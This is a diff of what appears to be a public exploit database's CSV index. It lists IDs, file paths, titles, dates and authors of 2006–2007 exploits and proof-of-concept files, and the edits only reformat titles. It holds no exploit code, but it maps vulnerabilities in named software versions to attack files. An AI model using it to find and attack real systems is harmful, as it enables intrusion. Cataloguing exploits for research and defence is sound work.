-2375,platforms/php/webapps/2375.txt,"Coppermine Photo Gallery 1.2.2b (Nuke Addon) Include",2006-09-15,3l3ctric-Cracker,php,webapps,0 +2375,platforms/php/webapps/2375.txt,"Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Include",2006-09-15,3l3ctric-Cracker,php,webapps,0 2376,platforms/php/webapps/2376.pl,"phpQuiz 0.1.2 - SQL Injection / Code Execution Exploit",2006-09-16,simo64,php,webapps,0 2377,platforms/php/webapps/2377.txt,"aeDating 4.1 - dir[inc] Remote File Inclusion",2006-09-16,NeXtMaN,php,webapps,0 2378,platforms/php/webapps/2378.php,"GNUTURK 2G (t_id) SQL Injection Exploit",2006-09-16,p2y,php,webapps,0 @@ -2146,7 +2146,7 @@ id,file,description,date,author,platform,type,port 2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard 2.1.b b2 - (index.php) Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 - (window.php) Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 2452,platforms/php/webapps/2452.txt,"phpSecurePages 0.28b - (secure.php) Remote File Inclusion",2006-09-28,D_7J,php,webapps,0 -2453,platforms/php/webapps/2453.txt,"phpBB XS 0.58a (phpbb_root_path) Remote File Inclusion",2006-09-28,"Mehmet Ince",php,webapps,0 +2453,platforms/php/webapps/2453.txt,"phpBB XS 0.58a - (phpbb_root_path) Remote File Inclusion",2006-09-28,"Mehmet Ince",php,webapps,0 2454,platforms/php/webapps/2454.txt,"PowerPortal 1.3a - (index.php) Remote File Inclusion",2006-09-29,v1per-haCker,php,webapps,0 2455,platforms/php/webapps/2455.php,"VideoDB 2.2.1 - (pdf.php) Remote File Inclusion Exploit",2006-09-29,Kacper,php,webapps,0 2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a - (display.php) SQL Injection Exploit",2006-09-29,Trex,php,webapps,0 @@ -2240,7 +2240,7 @@ id,file,description,date,author,platform,type,port 2544,platforms/php/webapps/2544.pl,"phpBB Amazonia Mod - (zufallscodepart.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2545,platforms/php/webapps/2545.pl,"phpBB News Defilante Horizontale 4.1.1 - Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2546,platforms/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 - (lat2cyr.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2547,platforms/php/webapps/2547.pl,"phpBB SpamOborona Mod 1.0b Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2547,platforms/php/webapps/2547.pl,"phpBB SpamOborona Mod 1.0b - Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2548,platforms/php/webapps/2548.pl,"phpBB RPG Events 1.0 functions_rpg_events Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2549,platforms/php/webapps/2549.pl,"phpBB SearchIndexer Mod - (archive_topic.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2550,platforms/php/webapps/2550.pl,"phpBB Prillian French Mod 0.8.0 - Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 @@ -2292,7 +2292,7 @@ id,file,description,date,author,platform,type,port 2596,platforms/php/webapps/2596.pl,"EPNadmin 0.7 - (constantes.inc.php) Remote File Inclusion Exploit",2006-10-19,Kw3[R]Ln,php,webapps,0 2597,platforms/multiple/dos/2597.pl,"Asterisk 1.0.12 / 1.2.12.1 - (chan_skinny) Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0 2598,platforms/php/webapps/2598.php,"PH Pexplorer 0.24 - (explorer_load_lang.php) Local File Inclusion Exploit",2006-10-19,Kacper,php,webapps,0 -2599,platforms/php/webapps/2599.txt,"pandaBB (displayCategory) Remote File Inclusion",2006-10-19,nukedclx,php,webapps,0 +2599,platforms/php/webapps/2599.txt,"pandaBB - (displayCategory) Remote File Inclusion",2006-10-19,nukedclx,php,webapps,0 2600,platforms/php/webapps/2600.txt,"Segue CMS 1.5.8 - (themesdir) Remote File Inclusion",2006-10-19,nuffsaid,php,webapps,0 2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - (RCPT) Remote Stack Overflow Exploit",2006-10-19,"Greg Linares",windows,remote,25 2602,platforms/php/webapps/2602.txt,"Power Phlogger 2.0.9 - (config.inc.php3) File Include",2006-10-19,x_w0x,php,webapps,0 @@ -2570,7 +2570,7 @@ id,file,description,date,author,platform,type,port 2892,platforms/linux/dos/2892.py,"F-Prot Antivirus 4.6.6 - (ACE) Denial of Service",2006-12-04,"Evgeny Legerov",linux,dos,0 2893,platforms/linux/dos/2893.py,"F-Prot Antivirus 4.6.6 - (CHM) Heap Overflow Exploit PoC",2006-12-04,"Evgeny Legerov",linux,dos,0 2894,platforms/php/webapps/2894.txt,"Phorum 3.2.11 - (common.php) Remote File Inclusion",2006-12-06,Mr-m07,php,webapps,0 -2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b (link) Remote File Inclusion Exploit",2006-12-07,3l3ctric-Cracker,php,webapps,0 +2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - (link) Remote File Inclusion Exploit",2006-12-07,3l3ctric-Cracker,php,webapps,0 2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - File Include",2006-12-08,3l3ctric-Cracker,php,webapps,0 2897,platforms/php/webapps/2897.txt,"CM68 News 12.02.06 - (addpth) Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",php,webapps,0 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 - (render.php) Remote File Inclusion",2006-12-08,r0ut3r,php,webapps,0 @@ -2579,7 +2579,7 @@ id,file,description,date,author,platform,type,port 2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service",2006-12-09,rgod,windows,dos,0 2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 - (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0 2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 - (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0 -2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 +2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c - Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 2905,platforms/php/webapps/2905.txt,"Gizzar 03162002 - (index.php) Remote File Inclusion",2006-12-09,DeltahackingTEAM,php,webapps,0 2906,platforms/php/webapps/2906.pl,"Fantastic News 2.1.4 - (news.php) SQL Injection Exploit",2006-12-09,Bl0od3r,php,webapps,0 2907,platforms/asp/webapps/2907.txt,"SpotLight CRM 1.0 - (login.asp) SQL Injection",2006-12-09,ajann,asp,webapps,0 @@ -2684,7 +2684,7 @@ id,file,description,date,author,platform,type,port 3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - (path) Remote File Inclusion Exploit",2006-12-25,DeltahackingTEAM,php,webapps,0 3009,platforms/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - (mod_root) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - (basepath) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 -3011,platforms/php/webapps/3011.pl,"Fishyshoop 0.930b Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0 +3011,platforms/php/webapps/3011.pl,"Fishyshoop 0.930b - Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0 3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - (ataturk.php) Remote File Inclusion",2006-12-25,ShaFuck31,php,webapps,0 3013,platforms/windows/dos/3013.py,"Microsoft Windows - NetrWkstaUserEnum() Remote Denial of Service (0Day)",2006-12-25,h07,windows,dos,0 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Remote Upload File / Code Execution",2006-12-25,CorryL,php,webapps,0 @@ -2692,7 +2692,7 @@ id,file,description,date,author,platform,type,port 3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 - Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0 3017,platforms/php/webapps/3017.php,"php-update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0 -3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b (cal_dir) Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps,0 +3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b - (cal_dir) Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps,0 3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - (admin/uploads.php) Remote Code Execution Exploit",2006-12-26,undefined1_,php,webapps,0 3021,platforms/linux/remote/3021.txt,"ProFTPD 1.2.9 rc2 - (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 @@ -2721,16 +2721,16 @@ id,file,description,date,author,platform,type,port 3046,platforms/asp/webapps/3046.txt,"SoftArtisans SAFileUp 5.0.14 - (viewsrc.asp) Script Source Disclosure",2006-12-30,"Inge Henriksen",asp,webapps,0 3047,platforms/php/webapps/3047.txt,"FreeStyle Wiki 3.6.2 - (user.dat) Password Disclosure",2006-12-30,bd0rk,php,webapps,0 3048,platforms/asp/webapps/3048.pl,"Click N Print Coupons 2006.01 - (key) SQL Injection Exploit",2006-12-30,ajann,asp,webapps,0 -3049,platforms/php/webapps/3049.php,"IMGallery 2.5 Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0 +3049,platforms/php/webapps/3049.php,"IMGallery 2.5 - Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0 3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 3051,platforms/php/webapps/3051.txt,"WordPress Enigma 2 Bridge Plugin - (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 -3052,platforms/windows/dos/3052.c,"Microsoft Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free",2006-12-31,"Ruben Santamarta ",windows,dos,0 +3052,platforms/windows/dos/3052.c,"Microsoft Windows - NtRaiseHardError Csrss.exe-winsrv.dll Double Free",2006-12-31,"Ruben Santamarta ",windows,dos,0 3053,platforms/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 3054,platforms/php/webapps/3054.txt,"P-News 1.16 / 1.17 - (user.dat) Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 3055,platforms/windows/remote/3055.html,"WinZIP 10.0 - FileView ActiveX Controls Remote Overflow Exploit",2006-12-31,XiaoHui,windows,remote,0 3056,platforms/windows/dos/3056.pl,"Formbankserver 1.9 - (Name) Remote Denial of Service",2006-12-31,Bl0od3r,windows,dos,0 3057,platforms/php/webapps/3057.php,"MDForum 2.0.1 - (PNSVlang) Remote Code Execution Exploit",2006-12-31,Kacper,php,webapps,0 -3058,platforms/windows/remote/3058.html,"Rediff Bol Downloader (ActiveX Control) Execute Local File Exploit",2006-12-31,"Gregory R. Panakkal",windows,remote,0 +3058,platforms/windows/remote/3058.html,"Rediff Bol Downloader - (ActiveX Control) Execute Local File Exploit",2006-12-31,"Gregory R. Panakkal",windows,remote,0 3059,platforms/php/webapps/3059.txt,"Bubla 0.9.2 - (bu_dir) Multiple Remote File Inclusion",2006-12-31,DeltahackingTEAM,php,webapps,0 3060,platforms/asp/webapps/3060.txt,"RBlog 1.0 - (admin.mdb) Remote Password Disclosure",2007-01-01,"Aria-Security Team",asp,webapps,0 3061,platforms/asp/webapps/3061.txt,"Vizayn Haber - (haberdetay.asp id variable) SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 @@ -2791,7 +2791,7 @@ id,file,description,date,author,platform,type,port 3116,platforms/php/webapps/3116.php,"sNews 1.5.30 - Remote Reset Admin Pass / Command Exec Exploit",2007-01-12,rgod,php,webapps,0 3117,platforms/php/webapps/3117.txt,"LunarPoll 1.0 - (show.php PollDir) Remote File Inclusion",2007-01-12,"ilker Kandemir",php,webapps,0 3118,platforms/php/webapps/3118.txt,"TLM CMS 1.1 - (i-accueil.php chemin) Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 -3119,platforms/windows/dos/3119.py,"VLC Media Player 0.8.6a Unspecified Denial of Service",2007-01-12,shinnai,windows,dos,0 +3119,platforms/windows/dos/3119.py,"VLC Media Player 0.8.6a - Unspecified Denial of Service",2007-01-12,shinnai,windows,dos,0 3120,platforms/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 - (duyuru.asp id) SQL Injection",2007-01-12,chernobiLe,php,webapps,0 3121,platforms/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - (common.php) Remote Inclusion",2007-01-12,GoLd_M,php,webapps,0 3122,platforms/asp/webapps/3122.pl,"DigiAffiliate 1.4 - (visu_user.asp id) SQL Injection Exploit",2007-01-13,ajann,asp,webapps,0 @@ -2828,7 +2828,7 @@ id,file,description,date,author,platform,type,port 3155,platforms/windows/dos/3155.html,"BrowseDialog Class (ccrpbds6.dll) Internet Explorer 7 - Denial of Service",2007-01-18,shinnai,windows,dos,0 3156,platforms/osx/local/3156.rb,"Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST PoC Exploit",2007-01-19,MoAB,osx,local,0 3157,platforms/windows/dos/3157.html,"DivX Player 6.4.1 - (DivXBrowserPlugin npdivx32.dll) IE DoS",2007-01-19,shinnai,windows,dos,0 -3158,platforms/windows/remote/3158.c,"Intel Centrino ipw2200BG Wireless Driver Remote Overflow PoC",2007-01-19,oveRet,windows,remote,0 +3158,platforms/windows/remote/3158.c,"Intel Centrino ipw2200BG - Wireless Driver Remote Overflow PoC",2007-01-19,oveRet,windows,remote,0 3159,platforms/windows/local/3159.cpp,"Microsoft Help Workshop 4.03.0002 - (.HPJ) Buffer Overflow Exploit",2007-01-19,porkythepig,windows,local,0 3160,platforms/osx/dos/3160.html,"Transmit.app 3.5.5 ftps:// URL Handler Heap Buffer Overflow PoC",2007-01-20,MoAB,osx,dos,0 3161,platforms/php/webapps/3161.txt,"PhpSherpa - (include/config.inc.php) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 @@ -2906,7 +2906,7 @@ id,file,description,date,author,platform,type,port 3235,platforms/php/webapps/3235.txt,"Phpbb Tweaked 3 - (phpbb_root_path) Remote Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 3236,platforms/php/webapps/3236.txt,"Hailboards 1.2.0 - (phpbb_root_path) Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 3237,platforms/php/webapps/3237.txt,"Cadre PHP Framework Remote File Inclusion",2007-01-31,y3dips,php,webapps,0 -3238,platforms/php/webapps/3238.txt,"PHPMyRing 4.1.3b (fichier) Remote File Inclusion",2007-01-31,ajann,php,webapps,0 +3238,platforms/php/webapps/3238.txt,"PHPMyRing 4.1.3b - (fichier) Remote File Inclusion",2007-01-31,ajann,php,webapps,0 3239,platforms/php/webapps/3239.htm,"Extcalendar 2 - (profile.php) Remote User Pass Change Exploit",2007-01-31,ajann,php,webapps,0 3240,platforms/php/webapps/3240.txt,"JV2 Folder Gallery 3.0 - Remote File Inclusion",2007-01-31,"ThE dE@Th",php,webapps,0 3241,platforms/asp/webapps/3241.txt,"Hunkaray Duyuru Scripti (tr) SQL Injection Exploit",2007-01-31,cl24zy,asp,webapps,0 @@ -2947,7 +2947,7 @@ id,file,description,date,author,platform,type,port 3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow Denial of Service",2007-02-06,Marsu,windows,dos,0 3277,platforms/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 - Remote Heap Overflow Denial of Service",2007-02-06,Marsu,windows,dos,0 3278,platforms/php/webapps/3278.txt,"Kisisel Site 2007 - (tr) SQL Injection",2007-02-06,cl24zy,php,webapps,0 -3279,platforms/windows/remote/3279.html,"Alibaba Alipay (Remove ActiveX) Remote Code Execution Exploit",2007-02-06,cocoruder,windows,remote,0 +3279,platforms/windows/remote/3279.html,"Alibaba Alipay - (Remove ActiveX) Remote Code Execution Exploit",2007-02-06,cocoruder,windows,remote,0 3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 - (top.inc.php rootdir) Remote File Inclusion",2007-02-07,GoLd_M,php,webapps,0 3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - (index_album.php) Remote File Inclusion",2007-02-07,MadNet,php,webapps,0 3282,platforms/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev - Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0 @@ -2985,7 +2985,7 @@ id,file,description,date,author,platform,type,port 3314,platforms/php/webapps/3314.txt,"ZebraFeeds 1.0 - (zf_path) Remote File Inclusion",2007-02-15,"ThE dE@Th",php,webapps,0 3315,platforms/php/webapps/3315.txt,"nabopoll 1.2 - (survey.inc.php path) Remote File Inclusion",2007-02-15,Cr@zy_King,php,webapps,0 3317,platforms/asp/webapps/3317.txt,"CodeAvalanche News 1.x - (CAT_ID) SQL Injection",2007-02-15,beks,asp,webapps,0 -3318,platforms/asp/webapps/3318.txt,"Aktueldownload Haber scripti (id) SQL Injection",2007-02-15,"Mehmet Ince",asp,webapps,0 +3318,platforms/asp/webapps/3318.txt,"Aktueldownload Haber scripti - (id) SQL Injection",2007-02-15,"Mehmet Ince",asp,webapps,0 3319,platforms/windows/remote/3319.pl,"MailEnable Enterprise 2.32 < 2.34 - Remote Buffer Overflow Exploit",2007-02-16,mu-b,windows,remote,143 3320,platforms/windows/remote/3320.pl,"MailEnable Professional 2.35 - Remote Buffer Overflow Exploit",2007-02-16,mu-b,windows,remote,143 3321,platforms/asp/webapps/3321.txt,"Snitz Forums 2000 3.1 SR4 - (pop_profile.asp) SQL Injection",2007-02-16,"Mehmet Ince",asp,webapps,0 @@ -3084,7 +3084,7 @@ id,file,description,date,author,platform,type,port 3415,platforms/linux/dos/3415.html,"Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) Denial of Service",2007-03-05,mark,linux,dos,0 3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) SQL Injection Exploit",2007-03-05,ajann,php,webapps,0 3417,platforms/windows/local/3417.php,"PHP 4.4.6 - mssql_[p]connect() Local Buffer Overflow Exploit",2007-03-05,rgod,windows,local,0 -3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server 4.01b (check) Buffer Overflow Exploit PoC",2007-03-06,mu-b,windows,dos,0 +3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server 4.01b - (check) Buffer Overflow Exploit PoC",2007-03-06,mu-b,windows,dos,0 3419,platforms/windows/dos/3419.txt,"Microsoft Windows - (.doc) Malformed Pointers Denial of Service",2007-03-06,Marsu,windows,dos,0 3420,platforms/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow Exploit (2)",2007-03-06,prdelka,windows,remote,0 3421,platforms/windows/dos/3421.html,"Macromedia 10.1.4.20 - SwDir.dll Internet Explorer Stack Overflow DoS",2007-03-07,shinnai,windows,dos,0 @@ -3099,7 +3099,7 @@ id,file,description,date,author,platform,type,port 3430,platforms/windows/dos/3430.html,"Adobe Reader plugin AcroPDF.dll 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos,0 3431,platforms/windows/local/3431.php,"PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC",2007-03-08,rgod,windows,local,0 3432,platforms/windows/dos/3432.pl,"TFTPDWIN Server 0.4.2 - (UDP) Denial of Service",2007-03-08,"Umesh Wanve",windows,dos,0 -3433,platforms/windows/dos/3433.html,"Rediff Toolbar ActiveX Control Remote Denial of Service",2007-03-08,"Umesh Wanve",windows,dos,0 +3433,platforms/windows/dos/3433.html,"Rediff Toolbar - ActiveX Control Remote Denial of Service",2007-03-08,"Umesh Wanve",windows,dos,0 3434,platforms/multiple/dos/3434.c,"Snort 2.6.1.1/2.6.1.2/2.7.0 - (fragementation) Remote Denial of Service",2007-03-08,Antimatt3r,multiple,dos,0 3435,platforms/php/webapps/3435.txt,"netForo! 0.1 - (down.php file_to_download) Remote File Disclosure",2007-03-08,GoLd_M,php,webapps,0 3436,platforms/php/webapps/3436.txt,"WEBO (Web Organizer) 1.0 - (baseDir) Remote File Inclusion",2007-03-08,K-159,php,webapps,0 @@ -3159,8 +3159,8 @@ id,file,description,date,author,platform,type,port 3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 - (gallery.asp categoryid) SQL Injection",2007-03-15,WiLdBoY,asp,webapps,0 3494,platforms/php/webapps/3494.txt,"McGallery 0.5b - (download.php) Arbitrary File Download",2007-03-15,Piker,php,webapps,0 3495,platforms/windows/remote/3495.txt,"CA BrightStor ARCserve - (msgeng.exe) Remote Stack Overflow Exploit",2007-03-16,"Winny Thomas",windows,remote,6503 -3496,platforms/php/webapps/3496.php,"Php-Stats 0.1.9.1b (PC-REMOTE-ADDR) SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 -3497,platforms/php/webapps/3497.php,"Php-Stats 0.1.9.1b (ip) SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 +3496,platforms/php/webapps/3496.php,"Php-Stats 0.1.9.1b - (PC-REMOTE-ADDR) SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 +3497,platforms/php/webapps/3497.php,"Php-Stats 0.1.9.1b - (ip) SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 - (kommentare.php) SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0 3499,platforms/linux/local/3499.php,"PHP 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit",2007-03-16,"Stefan Esser",linux,local,0 3500,platforms/php/webapps/3500.htm,"Particle Blogger 1.2.0 - (post.php postid) SQL Injection Exploit",2007-03-16,WiLdBoY,php,webapps,0 @@ -3182,7 +3182,7 @@ id,file,description,date,author,platform,type,port 3516,platforms/php/webapps/3516.php,"MetaForum 0.513 Beta - Remote File Upload Exploit",2007-03-19,Gu1ll4um3r0m41n,php,webapps,0 3517,platforms/osx/local/3517.php,"PHP 5.2.0 - header() Space Trimming Buffer Underflow Exploit (MacOSX)",2007-03-19,"Stefan Esser",osx,local,0 3518,platforms/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion Exploit",2007-03-19,GoLd_M,php,webapps,0 -3519,platforms/php/webapps/3519.txt,"phpBB Minerva Mod 2.0.21 build 238a SQL Injection",2007-03-19,"Mehmet Ince",php,webapps,0 +3519,platforms/php/webapps/3519.txt,"phpBB Minerva Mod 2.0.21 build 238a - SQL Injection",2007-03-19,"Mehmet Ince",php,webapps,0 3520,platforms/asp/webapps/3520.txt,"NetVios Portal - (page.asp) SQL Injection",2007-03-19,parad0x,asp,webapps,0 3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (Windows)",2007-03-19,bd0rk,php,webapps,0 3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (Windows)",2007-03-20,GoLd_M,php,webapps,0 @@ -3319,7 +3319,7 @@ id,file,description,date,author,platform,type,port 3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusion",2007-04-04,kezzap66345,php,webapps,0 3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Inclusion Exploit",2007-04-04,bd0rk,php,webapps,0 3661,platforms/windows/remote/3661.pl,"HP Mercury Quality Center Spider90.ocx ProgColor Overflow Exploit",2007-04-04,ri0t,windows,remote,0 -3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0 +3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution Exploit (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0 3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - BLIND SQL Injection Exploit",2007-04-04,ajann,php,webapps,0 3664,platforms/windows/local/3664.txt,"TrueCrypt 4.3 - Privilege Escalation Exploit",2007-04-04,"Marco Ivaldi",windows,local,0 3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - mutant_functions.php Remote File Inclusion Exploit",2007-04-04,bd0rk,php,webapps,0 @@ -3363,9 +3363,9 @@ id,file,description,date,author,platform,type,port 3704,platforms/php/webapps/3704.txt,"pl-php beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0 3705,platforms/php/webapps/3705.txt,"SimpCMS 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0 3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,php,webapps,0 -3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 +3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a - (absolute_path) Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Transversal Exploit",2007-04-11,shinnai,multiple,remote,0 -3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 non-existent applet Denial of Service",2007-04-11,shinnai,multiple,dos,0 +3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 - non-existent applet Denial of Service",2007-04-11,shinnai,multiple,dos,0 3710,platforms/php/webapps/3710.php,"PunBB 1.2.14 - Remote Code Execution Exploit",2007-04-11,DarkFig,php,webapps,0 3711,platforms/php/webapps/3711.htm,"CodeBreak 1.1.2 - (codebreak.php) Remote File Inclusion Exploit",2007-04-11,"John Martinelli",php,webapps,0 3712,platforms/php/webapps/3712.txt,"Mambo Module Weather - (absolute_path) Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 @@ -3393,7 +3393,7 @@ id,file,description,date,author,platform,type,port 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0 3736,platforms/php/webapps/3736.txt,"mambo/joomla component article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3737,platforms/windows/remote/3737.py,"Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow Exploit",2007-04-15,"Winny Thomas",windows,remote,139 -3738,platforms/windows/remote/3738.php,"XAMPP for Windows 1.6.0a mssql_connect() Remote BoF Exploit",2007-04-15,rgod,windows,remote,80 +3738,platforms/windows/remote/3738.php,"XAMPP for Windows 1.6.0a - mssql_connect() Remote BoF Exploit",2007-04-15,rgod,windows,remote,80 3739,platforms/php/webapps/3739.php,"Papoo 3.02 - (kontakt menuid) SQL Injection Exploit",2007-04-15,Kacper,php,webapps,0 3740,platforms/windows/remote/3740.c,"Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow Exploit",2007-04-15,devcode,windows,remote,139 3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - (who_r.php bj) Remote File Inclusion",2007-04-15,irvian,php,webapps,0 @@ -3445,7 +3445,7 @@ id,file,description,date,author,platform,type,port 3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - Remote Format String Exploit (exec-shield)",2007-04-24,Xpl017Elz,linux,remote,143 3788,platforms/windows/dos/3788.html,"Second Sight Software - ActiveGS.ocx ActiveX Buffer Overflow PoC",2007-04-24,"Umesh Wanve",windows,dos,0 3789,platforms/windows/dos/3789.html,"Second Sight Software - ActiveMod.ocx ActiveX Buffer Overflow PoC",2007-04-24,"Umesh Wanve",windows,dos,0 -3790,platforms/windows/dos/3790.html,"NetSprint Toolbar ActiveX toolbar.dll Denial of Service PoC",2007-04-24,"Umesh Wanve",windows,dos,0 +3790,platforms/windows/dos/3790.html,"NetSprint Toolbar - ActiveX toolbar.dll Denial of Service PoC",2007-04-24,"Umesh Wanve",windows,dos,0 3791,platforms/hardware/dos/3791.pl,"Linksys SPA941 \377 character Remote Denial of Service",2007-04-24,MADYNES,hardware,dos,0 3792,platforms/hardware/dos/3792.pl,"Linksys SPA941 - (remote reboot) Remote Denial of Service",2007-04-24,MADYNES,hardware,dos,0 3793,platforms/windows/local/3793.c,"Adobe Photoshop CS2 - / CS3 Unspecified .BMP File Buffer Overflow Exploit",2007-04-24,Marsu,windows,local,0 @@ -3489,7 +3489,7 @@ id,file,description,date,author,platform,type,port 3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp) File Disclosure",2007-05-02,Dj7xpl,asp,webapps,0 3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - (download.php item) Remote File 